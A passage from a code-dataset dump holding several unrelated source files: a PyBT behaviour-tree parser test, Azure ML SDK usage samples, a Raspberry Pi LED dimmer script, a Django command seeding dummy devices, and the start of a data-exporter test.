import Parser\nfrom ..node import NodeType\n\n\nclass TestParser(unittest.TestCase):\n def setUp(self):\n pass\n\n def test_parse_one_action(self):\n root = Parser.parse(\"\"\"\n action\n \"\"\")[0]\n assert(root.type == NodeType.ACTION_CONDITION)\n assert(root.action == \"action\")\n\n def test_fail_action(self):\n self.assertRaises(SyntaxWarning, Parser.parse, \"\"\"\n on_\"!#e\n \"\"\")\n\n def test_underscore_action(self):\n node = Parser.parse(\"one_action\")[0]\n assert node.type == NodeType.ACTION_CONDITION\n assert len(node.children) == 0\n\n def test_parse_two_actions(self):\n roots = Parser.parse(\"\"\"\n one\n two\n \"\"\")\n assert(len(roots)==2)\n assert(roots[0].type == NodeType.ACTION_CONDITION)\n assert(roots[1].type == NodeType.ACTION_CONDITION)\n assert(roots[0].action == \"one\")\n assert(roots[1].action == \"two\")\n\n def test_simple_sequence(self):\n root = Parser.parse(\"\"\"\n >\n one\n <\n \"\"\")[0]\n self.assertIs(root.type, NodeType.SEQUENCE)\n self.assertIs(len(root.children), 1)\n self.assertIs(root.children[0].type, NodeType.ACTION_CONDITION)\n\n def test_fail_sequence(self):\n self.assertRaises(SyntaxWarning, Parser.parse, \"\"\"\n >\n one\n \"\"\")\n\n def test_two_sequences(self):\n roots = Parser.parse(\"\"\"\n >\n one\n <\n >\n two\n <\n \"\"\")\n for i in range(0, 2):\n self.assertIs(roots[i].type, NodeType.SEQUENCE)\n self.assertIs(len(roots[i].children), 1)\n self.assertIs(roots[i].children[0].type, NodeType.ACTION_CONDITION)\n\n def test_nested_sequences(self):\n root = Parser.parse(\"\"\"\n >\n >\n two\n <\n <\n \"\"\")[0]\n assert(root.type == NodeType.SEQUENCE)\n assert(root.children[0].type == NodeType.SEQUENCE)\n assert(root.children[0].children[0].type == NodeType.ACTION_CONDITION)\n\n def test_prio(self):\n root = Parser.parse(\"\"\"\n ?\n one\n !\n \"\"\")[0]\n assert(root.type == NodeType.PRIORITY)\n assert(len(root.children) == 1)\n assert(root.children[0].type == NodeType.ACTION_CONDITION)\n assert(root.children[0].action == \"one\")\n\n def test_two_prio(self):\n roots = Parser.parse(\"\"\"\n ?\n one\n !\n ?\n two\n !\n \"\"\")\n for i in range(0, 2):\n self.assertIs(roots[i].type, NodeType.PRIORITY)\n self.assertIs(len(roots[i].children), 1)\n self.assertIs(roots[i].children[0].type, NodeType.ACTION_CONDITION)\n\n def test_nested_prio(self):\n root = Parser.parse(\"\"\"\n ?\n ?\n two\n !\n !\n \"\"\")[0]\n assert(root.type == NodeType.PRIORITY)\n assert(root.children[0].type == NodeType.PRIORITY)\n assert(root.children[0].children[0].type == NodeType.ACTION_CONDITION)\n\n def test_fail_prio(self):\n self.assertRaises(SyntaxWarning, Parser.parse, \"\"\"\n ?\n one\n \"\"\")\n\n def test_simple_parallel(self):\n root = Parser.parse(\"\"\"\n //\n one\n two\n \\\\\\\\\n \"\"\")[0]\n assert root.type == NodeType.PARALLEL\n assert len(root.children) == 2\n assert root.parallelSuccessCount == 2\n\n def test_simple_parallel_with_success_count(self):\n root = Parser.parse(\"\"\"\n /1/\n one\n two\n \\\\\\\\\n \"\"\")[0]\n assert root.type == NodeType.PARALLEL\n assert len(root.children) == 2\n assert root.parallelSuccessCount == 1\n\n def test_two_parallel(self):\n roots = Parser.parse(\"\"\"\n /1/\n one\n two\n \\\\\\\\\n //\n one\n two\n \\\\\\\\\n \"\"\")\n assert roots[0].type == NodeType.PARALLEL\n assert roots[1].type == NodeType.PARALLEL\n assert len(roots[0].children) == 2\n assert len(roots[1].children) == 2\n assert roots[0].parallelSuccessCount == 1\n assert roots[1].parallelSuccessCount == 2\n\n def test_simple_comment(self):\n root = 
Parser.parse(\"\"\"\n # comment\n action\n \"\"\")[0]\n assert root.type == NodeType.ACTION_CONDITION\n assert len(root.children) == 0\n\n def test_simple_same_line_comment(self):\n roots = Parser.parse(\"\"\"\n action # comment same line\n action_below\n \"\"\")\n assert roots[0].type == NodeType.ACTION_CONDITION\n assert len(roots[0].children) == 0\n\n def test_parse_full(self):\n root = Parser.parse(\"\"\"\n >\n one\n two\n ?\n three\n four\n !\n /2/\n parallelone\n paralleltwo\n \\\\\\\\\n //\n parallelthree\n parallelfour\n \\\\\\\\\n # dat comment\n ?\n five\n six\n !\n # moar comments\n <\n \"\"\")[0]\n assert(root.type == NodeType.SEQUENCE)\n\n def test_parse_with_subfile(self):\n root = Parser.parse(\"\"\"\n >\n first\n :pybt/tests/test.bt\n <\n \"\"\")[0]\n assert root.type == NodeType.SEQUENCE\n assert len(root.children) == 2\n test_bt = root.children[1]\n assert len(test_bt.children) == 4\n assert test_bt.type == NodeType.SEQUENCE\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"antonklava/PyBT","sub_path":"tests/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"3578508332","text":"import os\n\nfrom ml_samples_compute import handle_resource_exists_error\n\nfrom azure.ai.ml import MLClient\nfrom azure.identity import DefaultAzureCredential\n\nsubscription_id = os.environ[\"AZURE_SUBSCRIPTION_ID\"]\nresource_group = os.environ[\"RESOURCE_GROUP_NAME\"]\nworkspace_name = \"test-ws1\"\ncredential = DefaultAzureCredential()\nml_client = MLClient(credential, subscription_id, resource_group, workspace_name=workspace_name)\n\nimport uuid\n\njob_name = f\"iris-dataset-job-{str(uuid.uuid4())}\"\n\n\nclass MiscConfigurationOptions(object):\n def ml_misc_config_0(self):\n # [START job_operations_create_and_update]\n from azure.ai.ml import load_job\n\n created_job = ml_client.jobs.create_or_update(\n name=job_name,\n job=load_job(\n \"./sdk/ml/azure-ai-ml/tests/test_configs/command_job/command_job_test_local_env.yml\",\n params_override=[{\"name\": job_name}, {\"compute\": \"cpucluster\"}],\n ),\n )\n # [END job_operations_create_and_update]\n\n # [START job_operations_list]\n from azure.ai.ml._restclient.v2023_04_01_preview.models import ListViewType\n\n list_of_jobs = ml_client.jobs.list(parent_job_name=job_name, list_view_type=ListViewType.ARCHIVED_ONLY)\n # [END job_operations_list]\n\n # [START job_operations_get]\n retrieved_job = ml_client.jobs.get(job_name)\n # [END job_operations_get]\n\n # [START job_operations_cancel]\n cancel_poller = ml_client.jobs.begin_cancel(job_name)\n print(cancel_poller.result())\n # [END job_operations_cancel]\n\n # [START job_operations_validate]\n from azure.ai.ml import load_job\n from azure.ai.ml.entities import PipelineJob\n\n pipeline_job: PipelineJob = load_job(\n \"./sdk/ml/azure-ai-ml/tests/test_configs/pipeline_jobs/invalid/combo.yml\",\n params_override=[{\"name\": job_name}, {\"compute\": \"cpucluster\"}],\n )\n print(ml_client.jobs.validate(pipeline_job).error_messages)\n # [END job_operations_validate]\n\n # [START job_operations_archive]\n ml_client.jobs.archive(name=job_name)\n # [END job_operations_archive]\n\n # [START job_operations_restore]\n ml_client.jobs.restore(name=job_name)\n # [END job_operations_restore]\n\n # [START job_operations_stream_logs]\n running_job = ml_client.jobs.create_or_update(\n load_job(\n 
\"./sdk/ml/azure-ai-ml/tests/test_configs/command_job/command_job_test_local_env.yml\",\n params_override=[{\"name\": job_name}, {\"compute\": \"cpucluster\"}],\n )\n )\n ml_client.jobs.stream(running_job.name)\n # [END job_operations_stream_logs]\n\n # [START job_operations_download]\n ml_client.jobs.download(name=job_name, download_path=\"./job-1-logs\", all=True)\n # [END job_operations_download]\n\n # [START model_entity_create]\n from azure.ai.ml.entities import Model\n\n model = Model(\n name=\"model1\",\n version=\"5\",\n description=\"my first model in prod\",\n path=\"models/very_important_model.pkl\",\n properties={\"prop1\": \"value1\", \"prop2\": \"value2\"},\n type=\"mlflow_model\",\n flavors={\n \"sklearn\": {\"sklearn_version\": \"0.23.2\"},\n \"python_function\": {\"loader_module\": \"office.plrmodel\", \"python_version\": 3.6},\n },\n stage=\"Production\",\n )\n # [END model_entity_create]\n\n # [START model_batch_deployment_settings_entity_create]\n from azure.ai.ml.entities._deployment.model_batch_deployment_settings import ModelBatchDeploymentSettings\n\n modelBatchDeploymentSetting = ModelBatchDeploymentSettings(\n mini_batch_size=256,\n instance_count=5,\n max_concurrency_per_instance=2,\n output_file_name=\"output-file-name\",\n environment_variables={\"env1\": \"value1\", \"env2\": \"value2\"},\n error_threshold=2,\n logging_level=1,\n )\n # [END model_batch_deployment_settings_entity_create]\n\n # [START model_configuration_entity_create]\n from azure.ai.ml.entities._assets._artifacts._package.model_configuration import ModelConfiguration\n\n modelConfiguration = ModelConfiguration(mode=\"model-mode\", mount_path=\"model-mount-path\")\n # [END model_configuration_entity_create]\n\n # [START model_package_input_entity_create]\n from azure.ai.ml.entities._assets._artifacts._package.model_package import ModelPackageInput\n\n modelPackageInput = ModelPackageInput(type=\"input-type\", mode=\"input-mode\", mount_path=\"input-mount-path\")\n # [END model_package_input_entity_create]\n\n # [START model_package_entity_create]\n from azure.ai.ml.entities import AzureMLOnlineInferencingServer, CodeConfiguration, ModelPackage\n\n modelPackage = ModelPackage(\n inferencing_server=AzureMLOnlineInferencingServer(\n code_configuration=CodeConfiguration(code=\"../model-1/foo/\", scoring_script=\"score.py\")\n ),\n target_environment_name=\"env-name\",\n target_environment_version=\"1.0\",\n environment_variables={\"env1\": \"value1\", \"env2\": \"value2\"},\n tags={\"tag1\": \"value1\", \"tag2\": \"value2\"},\n )\n # [END model_package_entity_create]\n\n # [START create_inputs_outputs]\n from azure.ai.ml import Input, Output\n from azure.ai.ml.entities import CommandJob, CommandJobLimits\n\n command_job = CommandJob(\n code=\"./src\",\n command=\"python train.py --ss {search_space.ss}\",\n inputs={\n \"input1\": Input(path=\"trial.csv\", mode=\"ro_mount\", description=\"trial input data\"),\n \"input_2\": Input(\n path=\"azureml:list_data_v2_test:2\", type=\"uri_folder\", description=\"registered data asset\"\n ),\n },\n outputs={\"default\": Output(path=\"./foo\")},\n compute=\"trial\",\n environment=\"AzureML-sklearn-1.0-ubuntu20.04-py38-cpu:33\",\n limits=CommandJobLimits(timeout=120),\n )\n # [END create_inputs_outputs]\n\n # [START load_job]\n from azure.ai.ml import load_job\n\n job = load_job(source=\"./sdk/ml/azure-ai-ml/tests/test_configs/command_job/command_job_test_local_env.yml\")\n # [END load_job]\n\n # [START load_model]\n from azure.ai.ml import load_model\n\n model 
= load_model(\n source=\"./sdk/ml/azure-ai-ml/tests/test_configs/model/model_with_stage.yml\",\n params_override=[{\"name\": \"new_model_name\"}, {\"version\": \"1\"}],\n )\n # [END load_model]\n\n # [START load_model_package]\n from azure.ai.ml import load_model_package\n\n model_package = load_model_package(\n \"./sdk/ml/azure-ai-ml/tests/test_configs/model_package/model_package_simple.yml\"\n )\n # [END load_model_package]\n\n # [START tensorflow_distribution_configuration]\n from azure.ai.ml import TensorFlowDistribution\n from azure.ai.ml.entities import CommandComponent\n\n component = CommandComponent(\n name=\"microsoftsamples_tf\",\n description=\"This is the TF command component\",\n inputs={\n \"component_in_number\": {\"description\": \"A number\", \"type\": \"number\", \"default\": 10.99},\n \"component_in_path\": {\"description\": \"A path\", \"type\": \"uri_folder\"},\n },\n outputs={\"component_out_path\": {\"type\": \"uri_folder\"}},\n command=\"echo Hello World & echo ${{inputs.component_in_number}} & echo ${{inputs.component_in_path}} \"\n \"& echo ${{outputs.component_out_path}}\",\n environment=\"AzureML-sklearn-1.0-ubuntu20.04-py38-cpu:33\",\n distribution=TensorFlowDistribution(\n parameter_server_count=1,\n worker_count=2,\n ),\n instance_count=2,\n )\n # [END tensorflow_distribution_configuration]\n\n # [START pytorch_distribution_configuration]\n from azure.ai.ml import PyTorchDistribution\n from azure.ai.ml.entities import CommandComponent\n\n component = CommandComponent(\n name=\"microsoftsamples_torch\",\n description=\"This is the PyTorch command component\",\n inputs={\n \"component_in_number\": {\"description\": \"A number\", \"type\": \"number\", \"default\": 10.99},\n \"component_in_path\": {\"description\": \"A path\", \"type\": \"uri_folder\"},\n },\n outputs={\"component_out_path\": {\"type\": \"uri_folder\"}},\n command=\"echo Hello World & echo ${{inputs.component_in_number}} & echo ${{inputs.component_in_path}} \"\n \"& echo ${{outputs.component_out_path}}\",\n environment=\"AzureML-sklearn-1.0-ubuntu20.04-py38-cpu:33\",\n distribution=PyTorchDistribution(\n process_count_per_instance=2,\n ),\n instance_count=2,\n )\n # [END pytorch_distribution_configuration]\n\n # [START mpi_distribution_configuration]\n from azure.ai.ml import MpiDistribution\n from azure.ai.ml.entities import CommandComponent\n\n component = CommandComponent(\n name=\"microsoftsamples_mpi\",\n description=\"This is the MPI command component\",\n inputs={\n \"component_in_number\": {\"description\": \"A number\", \"type\": \"number\", \"default\": 10.99},\n \"component_in_path\": {\"description\": \"A path\", \"type\": \"uri_folder\"},\n },\n outputs={\"component_out_path\": {\"type\": \"uri_folder\"}},\n command=\"echo Hello World & echo ${{inputs.component_in_number}} & echo ${{inputs.component_in_path}} \"\n \"& echo ${{outputs.component_out_path}}\",\n environment=\"AzureML-sklearn-1.0-ubuntu20.04-py38-cpu:33\",\n distribution=MpiDistribution(\n process_count_per_instance=2,\n ),\n instance_count=2,\n )\n # [END mpi_distribution_configuration]\n\n # [START code_configuration]\n from azure.ai.ml.entities import BatchDeployment, CodeConfiguration\n\n deployment = BatchDeployment(\n name=\"non-mlflow-deployment\",\n description=\"this is a sample non-mlflow deployment\",\n endpoint_name=\"my-batch-endpoint\",\n model=model,\n code_configuration=CodeConfiguration(\n code=\"configs/deployments/model-2/onlinescoring\", scoring_script=\"score1.py\"\n ),\n environment=\"env\",\n 
compute=\"cpu-cluster\",\n instance_count=2,\n max_concurrency_per_instance=2,\n mini_batch_size=10,\n output_file_name=\"predictions.csv\",\n )\n # [END code_configuration]\n\n # [START intellectual_property_configuration]\n from azure.ai.ml.constants import IPProtectionLevel\n from azure.ai.ml.entities import CommandComponent, IntellectualProperty\n\n component = CommandComponent(\n name=\"random_name\",\n version=\"1\",\n environment=\"azureml:AzureML-Minimal:1\",\n command=\"echo hello\",\n intellectual_property=IntellectualProperty(publisher=\"contoso\", protection_level=IPProtectionLevel.ALL),\n )\n # [END intellectual_property_configuration]\n\n # [START personal_access_token_configuration]\n from azure.ai.ml.entities import PatTokenConfiguration, WorkspaceConnection\n\n ws_connection = WorkspaceConnection(\n target=\"my_target\",\n type=\"python_feed\",\n credentials=PatTokenConfiguration(pat=\"abcdefghijklmnopqrstuvwxyz\"),\n name=\"my_connection\",\n metadata=None,\n )\n # [END personal_access_token_configuration]\n\n # [START job_schedule_configuration]\n from azure.ai.ml import load_job\n from azure.ai.ml.entities import JobSchedule, RecurrencePattern, RecurrenceTrigger\n\n pipeline_job = load_job(\"./sdk/ml/azure-ai-ml/tests/test_configs/command_job/command_job_test_local_env.yml\")\n trigger = RecurrenceTrigger(\n frequency=\"week\",\n interval=4,\n schedule=RecurrencePattern(hours=10, minutes=15, week_days=[\"Monday\", \"Tuesday\"]),\n start_time=\"2023-03-10\",\n )\n job_schedule = JobSchedule(name=\"simple_sdk_create_schedule\", trigger=trigger, create_job=pipeline_job)\n # [END job_schedule_configuration]\n\n # [START cron_trigger_configuration]\n from datetime import datetime\n\n from azure.ai.ml.constants import TimeZone\n from azure.ai.ml.entities import CronTrigger\n\n trigger = CronTrigger(\n expression=\"15 10 * * 1\",\n start_time=datetime(year=2022, month=3, day=10, hour=10, minute=15),\n end_time=datetime(year=2022, month=6, day=10, hour=10, minute=15),\n time_zone=TimeZone.PACIFIC_STANDARD_TIME,\n )\n # [END cron_trigger_configuration]\n\n # [START resource_requirements_configuration]\n from azure.ai.ml.entities import (\n CodeConfiguration,\n KubernetesOnlineDeployment,\n ResourceRequirementsSettings,\n ResourceSettings,\n )\n\n blue_deployment = KubernetesOnlineDeployment(\n name=\"kubernetes_deployment\",\n endpoint_name=\"online_endpoint_name\",\n model=load_model(\"./sdk/ml/azure-ai-ml/tests/test_configs/model/model_with_stage.yml\"),\n environment=\"azureml:AzureML-Minimal:1\",\n code_configuration=CodeConfiguration(\n code=\"endpoints/online/model-1/onlinescoring\", scoring_script=\"score.py\"\n ),\n instance_count=1,\n resources=ResourceRequirementsSettings(\n requests=ResourceSettings(\n cpu=\"500m\",\n memory=\"0.5Gi\",\n ),\n limits=ResourceSettings(\n cpu=\"1\",\n memory=\"1Gi\",\n ),\n ),\n )\n # [END resource_requirements_configuration]\n\n # [START ssh_job_service_configuration]\n from azure.ai.ml import command\n from azure.ai.ml.entities import JupyterLabJobService, SshJobService, TensorBoardJobService, VsCodeJobService\n\n node = command(\n name=\"interactive-command-job\",\n description=\"description\",\n environment=\"AzureML-sklearn-1.0-ubuntu20.04-py38-cpu:33\",\n command=\"ls\",\n compute=\"testCompute\",\n services={\n \"my_ssh\": SshJobService(),\n \"my_tensorboard\": TensorBoardJobService(log_dir=\"~/blog\"),\n \"my_jupyter_lab\": JupyterLabJobService(),\n \"my_vscode\": VsCodeJobService(),\n },\n )\n # [END 
ssh_job_service_configuration]\n\n # [START build_context_entity_create]\n from azure.ai.ml.entities._assets.environment import BuildContext\n\n build_context = BuildContext(dockerfile_path=\"docker-file-path\", path=\"docker-build-context-path\")\n # [END build_context_entity_create]\n\n # [START base_env_entity_create]\n from azure.ai.ml.entities._assets._artifacts._package.base_environment_source import BaseEnvironment\n\n base_environment = BaseEnvironment(type=\"base-env-type\", resource_id=\"base-env-resource-id\")\n # [END base_env_entity_create]\n\n # [START env_entity_create]\n from azure.ai.ml.entities._assets.environment import Environment\n\n environment = Environment(\n name=\"env-name\",\n version=\"2.0\",\n description=\"env-description\",\n image=\"env-image\",\n conda_file=\"./sdk/ml/azure-ai-ml/tests/test_configs/deployments/model-1/environment/conda.yml\",\n tags={\"tag1\": \"value1\", \"tag2\": \"value2\"},\n properties={\"prop1\": \"value1\", \"prop2\": \"value2\"},\n datastore=\"datastore\",\n )\n # [END env_entity_create]\n\n # [START env_operations_create_or_update]\n from azure.ai.ml.entities import BuildContext, Environment\n\n env_docker_context = Environment(\n build=BuildContext(\n path=\"./sdk/ml/azure-ai-ml/tests/test_configs/environment/environment_files\",\n dockerfile_path=\"DockerfileNonDefault\",\n ),\n name=\"create-environment\",\n version=\"2.0\",\n description=\"Environment created from a Docker context.\",\n )\n ml_client.environments.create_or_update(env_docker_context)\n # [END env_operations_create_or_update]\n\n # [START env_entities_validate]\n from azure.ai.ml.entities import BuildContext, Environment\n\n env_docker_context = Environment(\n build=BuildContext(\n path=\"./sdk/ml/azure-ai-ml/tests/test_configs/environment/environment_files\",\n dockerfile_path=\"DockerfileNonDefault\",\n ),\n name=\"create-environment\",\n version=\"2.0\",\n description=\"Environment created from a Docker context.\",\n )\n\n env_docker_context.validate()\n # [END env_entities_validate]\n\n # [START env_operations_archive]\n ml_client.environments.archive(\"create-environment\", \"2.0\")\n # [END env_operations_archive]\n\n # [START env_operations_restore]\n ml_client.environments.restore(\"create-environment\", \"2.0\")\n # [END env_operations_restore]\n\n # [START env_operations_list]\n ml_client.environments.list()\n # [END env_operations_list]\n\n # [START env_operations_get]\n ml_client.environments.get(\"create-environment\", \"2.0\")\n # [END env_operations_get]\n\n @handle_resource_exists_error\n def ml_misc_config_1(self):\n from random import randint\n\n from azure.ai.ml import load_batch_endpoint\n from azure.ai.ml.entities import BatchEndpoint\n\n endpoint_example = load_batch_endpoint(\n source=\"./sdk/ml/azure-ai-ml/tests/test_configs/endpoints/batch/batch_endpoint_mlflow_new.yaml\",\n params_override=[{\"name\": f\"endpoint-{randint(0, 1000)}\"}],\n )\n ml_client.batch_endpoints.begin_create_or_update(endpoint_example)\n endpoint_name = endpoint_example.name\n\n # [START batch_deployment_operations_begin_create_or_update]\n from azure.ai.ml import load_batch_deployment\n from azure.ai.ml.entities import BatchDeployment\n\n deployment_example = load_batch_deployment(\n source=\"./sdk/ml/azure-ai-ml/tests/test_configs/deployments/batch/batch_deployment_anon_env_with_image.yaml\",\n params_override=[{\"name\": f\"deployment-{randint(0, 1000)}\", \"endpoint_name\": endpoint_example.name}],\n )\n\n 
ml_client.batch_deployments.begin_create_or_update(deployment=deployment_example, skip_script_validation=True)\n # [END batch_deployment_operations_begin_create_or_update]\n\n deployment_name = deployment_example.name\n\n # [START batch_deployment_operations_get]\n ml_client.batch_deployments.get(deployment_name, endpoint_name)\n # [END batch_deployment_operations_get]\n\n # [START batch_deployment_operations_list]\n ml_client.batch_deployments.list(endpoint_name)\n # [END batch_deployment_operations_list]\n\n # [START batch_deployment_operations_list_jobs]\n ml_client.batch_deployments.list_jobs(deployment_name, endpoint_name)\n # [END batch_deployment_operations_list_jobs]\n\n # [START batch_deployment_operations_delete]\n ml_client.batch_deployments.begin_delete(deployment_name, endpoint_name)\n # [END batch_deployment_operations_delete]\n\n # [START batch_endpoint_operations_list]\n ml_client.batch_endpoints.list()\n # [END batch_endpoint_operations_list]\n\n # [START batch_endpoint_operations_get]\n ml_client.batch_endpoints.get(endpoint_name)\n # [END batch_endpoint_operations_get]\n\n # [START batch_endpoint_operations_delete]\n ml_client.batch_endpoints.begin_delete(endpoint_name)\n # [END batch_endpoint_operations_delete]\n\n from random import randint\n\n endpoint_name_2 = f\"new-endpoint-{randint(0, 1000)}\"\n\n # [START batch_endpoint_operations_create_or_update]\n from azure.ai.ml.entities import BatchEndpoint\n\n endpoint_example = BatchEndpoint(name=endpoint_name_2)\n ml_client.batch_endpoints.begin_create_or_update(endpoint_example)\n # [END batch_endpoint_operations_create_or_update]\n\n # [START batch_endpoint_operations_invoke]\n ml_client.batch_endpoints.invoke(endpoint_name_2)\n # [END batch_endpoint_operations_invoke]\n\n # [START batch_endpoint_operations_list_jobs]\n ml_client.batch_endpoints.list_jobs(endpoint_name_2)\n # [END batch_endpoint_operations_list_jobs]\n\n def ml_misc_config_2(self):\n # [START component_operations_create_or_update]\n from azure.ai.ml import load_component\n from azure.ai.ml.entities._component.component import Component\n\n component_example = load_component(\n source=\"./sdk/ml/azure-ai-ml/tests/test_configs/components/helloworld_component.yml\",\n params_override=[{\"version\": \"1.0.2\"}],\n )\n component = ml_client.components.create_or_update(component_example)\n # [END component_operations_create_or_update]\n print(component)\n\n # [START code_operations_create_or_update]\n from azure.ai.ml.entities._assets._artifacts.code import Code\n\n code_example = Code(name=\"my-code-asset\", version=\"2.0\", path=\"./sdk/ml/azure-ai-ml/samples/src\")\n code_asset = ml_client._code.create_or_update(code_example)\n # [END code_operations_create_or_update]\n\n from random import randint\n\n data_asset_name = f\"data_asset_name_{randint(0, 1000)}\"\n # [START data_operations_create_or_update]\n from azure.ai.ml.entities import Data\n\n data_asset_example = Data(name=data_asset_name, version=\"2.0\", path=\"./sdk/ml/azure-ai-ml/samples/src\")\n ml_client.data.create_or_update(data_asset_example)\n # [END data_operations_create_or_update]\n\n # [START component_operations_list]\n print(ml_client.components.list())\n # [END component_operations_list]\n\n # [START component_operations_get]\n ml_client.components.get(name=component_example.name, version=\"1.0.2\")\n # [END component_operations_get]\n\n # [START component_operations_validate]\n from azure.ai.ml.entities._component.component import Component\n\n 
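
# The begin_* operations in this sample return LROPollers; a minimal usage
# sketch (assumes ml_client and endpoint_example from the surrounding code):
poller = ml_client.batch_endpoints.begin_create_or_update(endpoint_example)
endpoint = poller.result()  # block until the long-running operation finishes
print(endpoint.name)
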
ml_client.components.validate(component_example)\n # [END component_operations_validate]\n\n # [START component_operations_archive]\n ml_client.components.archive(name=component_example.name)\n # [END component_operations_archive]\n\n # [START component_operations_restore]\n ml_client.components.restore(name=component_example.name)\n # [END component_operations_restore]\n\n # [START code_operations_get]\n ml_client._code.get(name=code_asset.name, version=code_asset.version)\n # [END code_operations_get]\n\n # [START data_operations_list]\n ml_client.data.list(name=\"data_asset_name\")\n # [END data_operations_list]\n\n # [START data_operations_get]\n ml_client.data.get(name=\"data_asset_name\", version=\"2.0\")\n # [END data_operations_get]\n\n # [START data_operations_import_data]\n from azure.ai.ml.entities._data_import.data_import import DataImport\n from azure.ai.ml.entities._inputs_outputs.external_data import Database\n\n database_example = Database(query=\"SELECT ID FROM DataTable\", connection=\"azureml:my_azuresqldb_connection\")\n data_import_example = DataImport(\n name=\"data_asset_name\", path=\"azureml://datastores/workspaceblobstore/paths/\", source=database_example\n )\n ml_client.data.import_data(data_import_example)\n # [END data_operations_import_data]\n\n # [START data_operations_list_materialization_status]\n ml_client.data.list_materialization_status(\"data_asset_name\")\n # [END data_operations_list_materialization_status]\n\n # [START data_operations_archive]\n ml_client.data.archive(\"data_asset_name\")\n # [END data_operations_archive]\n\n # [START data_operations_restore]\n ml_client.data.restore(\"data_asset_name\")\n # [END data_operations_restore]\n\n try:\n # [START data_operations_share]\n ml_client.data.share(\n name=\"data_asset_name\",\n version=\"2.0\",\n registry_name=\"my-registry\",\n share_with_name=\"transformed-nyc-taxi-data-shared-from-ws\",\n share_with_version=\"2.0\",\n )\n # [END data_operations_share]\n except TypeError:\n pass\n\n # [START datastore_operations_create_or_update]\n from azure.ai.ml.entities import AzureBlobDatastore\n\n datastore_example = AzureBlobDatastore(\n name=\"azure_blob_datastore\",\n account_name=\"sdkvnextclidcdnrc7zb7xyy\", # cspell:disable-line\n container_name=\"testblob\",\n )\n ml_client.datastores.create_or_update(datastore_example)\n # [END datastore_operations_create_or_update]\n\n # [START datastore_operations_list]\n ml_client.datastores.list()\n # [END datastore_operations_list]\n\n # [START datastore_operations_get]\n ml_client.datastores.get(\"azure_blob_datastore\")\n # [END datastore_operations_get]\n\n # [START datastore_operations_get_default]\n ml_client.datastores.get_default()\n # [END datastore_operations_get_default]\n\n # [START datastore_operations_delete]\n ml_client.datastores.delete(\"azure_blob_datastore\")\n # [END datastore_operations_delete]\n\n # [START validation_result]\n \"\"\"For example, if repr(self) is:\n ```python\n {\n \"errors\": [\n {\n \"path\": \"jobs.job_a.inputs.input_str\",\n \"message\": \"input_str is required\",\n \"value\": None,\n },\n {\n \"path\": \"jobs.job_a.inputs.input_str\",\n \"message\": \"input_str must be in the format of xxx\",\n \"value\": None,\n },\n {\n \"path\": \"settings.on_init\",\n \"message\": \"On_init job name job_b does not exist in jobs.\",\n \"value\": None,\n },\n ],\n \"warnings\": [\n {\n \"path\": \"jobs.job_a.inputs.input_str\",\n \"message\": \"input_str is required\",\n \"value\": None,\n }\n ]\n }\n ```\n then the error_messages 
will be:\n ```python\n {\n \"jobs.job_a.inputs.input_str\": \"input_str is required; input_str must be in the format of xxx\",\n \"settings.on_init\": \"On_init job name job_b does not exist in jobs.\",\n }\n ```\n \"\"\"\n\n @handle_resource_exists_error\n def ml_misc_config_3(self):\n # [START job_operations_show_services]\n job_services = ml_client.jobs.show_services(job_name)\n # [END job_operations_show_services]\n\n\nif __name__ == \"__main__\":\n sample = MiscConfigurationOptions()\n sample.ml_misc_config_0()\n sample.ml_misc_config_1()\n sample.ml_misc_config_2()\n sample.ml_misc_config_3()\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/ml/azure-ai-ml/samples/ml_samples_misc.py","file_name":"ml_samples_misc.py","file_ext":"py","file_size_in_byte":28015,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"8546881840","text":"import RPi.GPIO as GPIO\nimport time\n\nled = 16\n\nGPIO.setmode(GPIO.BOARD)\n\nGPIO.setup(led, GPIO.OUT)\npmwLed = GPIO.PWM(led, 500)\ndelTime = (float)(raw_input(\"Enter Cycle Duration: \"))\ndelTime = delTime/200\ntry:\n\tpmwLed.start(0)\n\ttime.sleep(1)\n\ti = 0\n\tchange = 1\n\twhile True:\n\t\tpmwLed.ChangeDutyCycle(i)\n\t\ttime.sleep(delTime)\n\t\ti+=change\n\t\tif i > 100:\n\t\t\tchange = -1\n\t\t\ti = 100\n\t\tif i < 0:\n\t\t\tchange = 1\n\t\t\ti = 0\nexcept KeyboardInterrupt:\n\tpmwLed.stop()\n\tGPIO.cleanup()\n","repo_name":"Dan12/piCode","sub_path":"python/dimmer.py","file_name":"dimmer.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74219991201","text":"from django.core.management.base import BaseCommand\nfrom django.utils import timezone\nimport random\nfrom experiment.models import DiRPiDevice, DiRPiGroup, DiRPiConfiguration\n\nclass Command(BaseCommand):\n help = 'Adds 3 dummy DiRPi devices to the database'\n\n def handle(self, *args, **kwargs):\n configuration = DiRPiConfiguration.objects.first()\n if not configuration:\n self.stdout.write(self.style.ERROR('Configuration not found. Please add it first.'))\n return\n\n groups = DiRPiGroup.objects.all()\n if not groups.exists():\n self.stdout.write(self.style.ERROR('Groups not found. 
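
# Note: dimmer.py above uses raw_input, which exists only on Python 2; under
# Python 3 the equivalent prompt would be (sketch):
delTime = float(input("Enter Cycle Duration: ")) / 200
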
Please run add_dirpi_groups command first.'))\n return\n\n for i in range(1, 4):\n group = groups[i % groups.count()] # Assigning groups in a round-robin fashion\n\n # Build device object and add to group before saving \n device = DiRPiDevice( \n device_number=i, \n group=group,\n device_ip=f'192.168.1.{i}', \n configuration=configuration, \n status='active', \n last_ping_time=timezone.now(), \n health_status='good', \n current_run_number=random.randint(1, 100) \n ) \n device.save() \n group.devices.add(device) \n group.save() \n\n self.stdout.write(self.style.SUCCESS(f'Device {device.device_id} added to group {group.group_name} successfully.'))\n","repo_name":"joseph-crowley/accelerator-diagnostics-project","sub_path":"experiment/management/commands/add_dirpi_devices.py","file_name":"add_dirpi_devices.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6813521159","text":"import unittest\r\nimport os\r\nfrom src.utils.DataExporter import DataExporter\r\n\r\nclass TestDataExporter(unittest.TestCase):\r\n def setUp(self):\r\n self.data_exporter 